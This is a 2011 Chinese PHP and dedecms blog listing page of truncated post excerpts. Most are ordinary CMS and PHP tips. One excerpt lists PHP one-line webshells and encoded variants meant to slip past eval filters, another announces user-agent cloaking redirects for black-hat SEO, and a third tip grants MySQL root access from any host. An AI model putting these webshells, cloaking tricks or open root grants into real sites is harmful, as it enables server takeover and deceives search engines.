Dec312011
根据user-agent判断蜘蛛代码 黑帽跳转代码
黑帽seo手段中有一个大家都在用的技巧,在服务端判断 客户端浏览器的user-agent然后做进一步操作,
如果是搜索引擎的user-agent则301跳转 目前网上好多欺骗友情链接的就是这个做法(代码会放在最后)
具体还有很多思路,跳转了,乔页等 今天仅把代码放出来 php的代码
声明 代码都是百度下来的 先写个简单的
根据php的 $_SERVER['HTTP_USER_AGENT']来进行判断
?View Code PHP1
2
3
4
5
6
...阅读全文
抢沙发
Dec292011
Dec292011
php一句话变异收集
转自 土司 原创作者请联系 会标明版权
在渗透中常常遇到拦截eval的,所以
<?php eval($_POST[xiao])?>这种形式的会被拦截
常见的是变成
base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)
这种形式可以绕过,另外还有其他形式
<?php $_GET['eval']($_POST['xiao']);?>
今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。
完了才知道是个webshell扫描工...阅读全文
作者:骚鱼 | 分类:PHP | 阅读:400 views |
Nov192011
针对$_SERVER[’PHP_SELF’]的跨站脚本攻击
现在的web服务器和开发工具虽然不会再出现像asp的%81那样明显的漏洞了,但是由于开发人员的疏忽和各种语言特性组合造成的一些奇异的漏洞仍然会存在。今天偶然读到的XSS Woes,就详细讲述了和$_SERVER[’PHP_SELF’]相关的一个危险漏洞。
$_SERVER[’PHP_SELF’]在开发的时候常会用到,一般用来引用当前网页地址,并且它是系统自动生成的全局变量,也会有什么问题么?让我们先看看下面的代码吧:...阅读全文
作者:骚鱼 | 分类:PHP | 阅读:140 views |
Sep282011
winiis 开启和关闭mysql远程连接 root
默认安装mysql是关闭远程连接的 这样也有助于系统的安全 但是有时候需要开启下远程连接方便操作
在网上查了一下 总结了几个 写在这 方便以后备用
开启连接 mysql -uroot -p 进入mysql 输入密码
GRANT ALL PRIVILEGES ON * . * TO ‘root’@'%’ IDENTIFIED BY ‘你的mysql密码’ WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDA...阅读全文
Sep272011
dedecms 相关文章全站关联的方法
dedecms调用相关文章很简单
标签名称:likearticle
功能说明:自动关连文档标签
适用范围:内容页使用
基本语法:
{dede:likearticle row=” col=” titlelen=” infolen=”}
<a href=’[field:arcurl/]‘>[field:title/]</a>
{/dede:likearticle}
参数说明:
col=” 分多少列显示(默认为单列)
row=’10′ 返回文档列表总数
titlelen = ’30′ 标题...阅读全文
Sep262011
dedecms 数据库结构
记录一下 留着备用
安装后的dedecms一共有 86 张数据表。
主要数据结构表
dede_addonarticle:附加文章表
aid int(11) 文章编号
typeid int(11) 分类栏目编号
body mediumtext 文章内容
dede_addonflash 附加Flash表
aid int(11) FLASH编号
typeid int(11) 分类栏目编号
filesize varchar(10) 文件大小
playtime varchar(10) 播放时长
flashtype varchar(10) 作品类型
flashrank smallint(6...阅读全文
Sep092011
dedecms {dede:arclist} {dede:list} 的区别
{dede:arclist}xxxxx{/dede:arclist}语句可以应用于首页、封面页、列表栏目页、内容页。而{dede:list}XXXX{/dede:list}语句,则只能应用于列表栏目页。
列表栏目页,要添加多列文章标题的话,就可以用到{dede:arclist}xxxxx{/dede:arclist}语句。
阅读全文
Sep092011
dedecms自动审核插件出现的首页文章排序混乱问题
织梦的自动审核功能很犀利,适合懒人使用,不过它有一个问题:
当后台需要审核的文章比较多的时候,自动审核插件的审核是乱序的。也就是说不是按照后台发布未审核文章的顺序来审核文章的。
这就造成首页文章排序乱序的情况,如果文章少还没什么大的影响,如果文章比较多,往往会出现审核以后新文章连首页都排不上的问题,对网页收录存在一定的不友好。
修改方法是打开/include/taglib/arcli...阅读全文
Sep042011
php代码获取 百度收录和百度快照时间
这是在网上找的 稍微修改了下 将下面代码写入php文件
<?php
$domain = “www.saoyu.com/*欲查询的域名*/
$site_url = ‘http://www.baidu.com/s?wd=site%3A’;
$all = $site_url.$domain; /*域名所有收录的网址*/
$today = $all.’&lm=1′; /*域名今日收录的网址*/
$utf_pattern = “/找到相关结果数(.*)个/”;
$kz_pattern = “/<s...阅读全文
Aug282011
dedecms 自动生成 关键词列表
dedecms用着挺不错的 不过要做内链的话还得自己手工记录每篇文章的关键词
本想自己写一个 自动生成关键词列表的 结果在网上找了一下 还真有 在这记录一下
<?php
require_once (dirname(__FILE__) . “/include/common.inc.php”);
?>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd“>
<html...阅读全文
Aug182011
dedecms 把审核日期设为发表日期
dedecms 把审核日期设为发表日期 这个方法目前对 5.5 5.6有效
在后台管理文件夹(默认名称dede)中打开archives_do.php,在第224行找到下面这段代码
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
else if($dopost==”checkArchives”)
{
CheckPurview(‘a_Check,a_AccCheck,s...阅读全文
Jul312011
php在线开发手册目录索引
PHP 手册
目录
序文
入门指引
简介
PHP 是什么?
PHP 能做什么?
简明教程
我需要些什么?
您的第一个 PHP 页面
实用的脚本
处理表单
在新版本的 PHP 中使用旧的 PHP 代码
下一步做什么?
安装
安装前的准备
在 Unix/HP-UX 系统上安装
Unix/Linux 安装
Unix/Mac OS X installs
在 Unix/OpenBSD 系统上安装
Unix/Solaris 安装
在 Unix 系统上安装
Windows 系统下的安装
Servers-CGI/命令行
A...阅读全文
作者:骚鱼 | 分类:PHP | 阅读:143 views |
Jul312011
php开发手册 在线版
把php开发手册chm版折腾出来 放到网站上了 方便以后使用 地址
php开发手册 http://www.saoyu.com/php/
php开发目录 http://www.saoyu.com/php/mulu.html
阅读全文
作者:骚鱼 | 分类:PHP | 阅读:191 views |
Jul052011
zencart iis 伪静态设置 测试可用
IIS下如何实现静态化重写?特别是像zen cart等php类型的网站应该是经常碰到。一下教程也是网上找到的,实验下可以成功,这边分享下。
第一:首先我们需要下载一个ISAPI_Rewrite,有精简版和完全版,一般精简版只能对服务器全局进行配置,而完整版可以对服务器上的各个网站进行伪静态配置.对于个人站长来说,精简版就足够了.下载:http://www.isapirewrite.com/download/isapi_rwl_0055.msi
第二:...阅读全文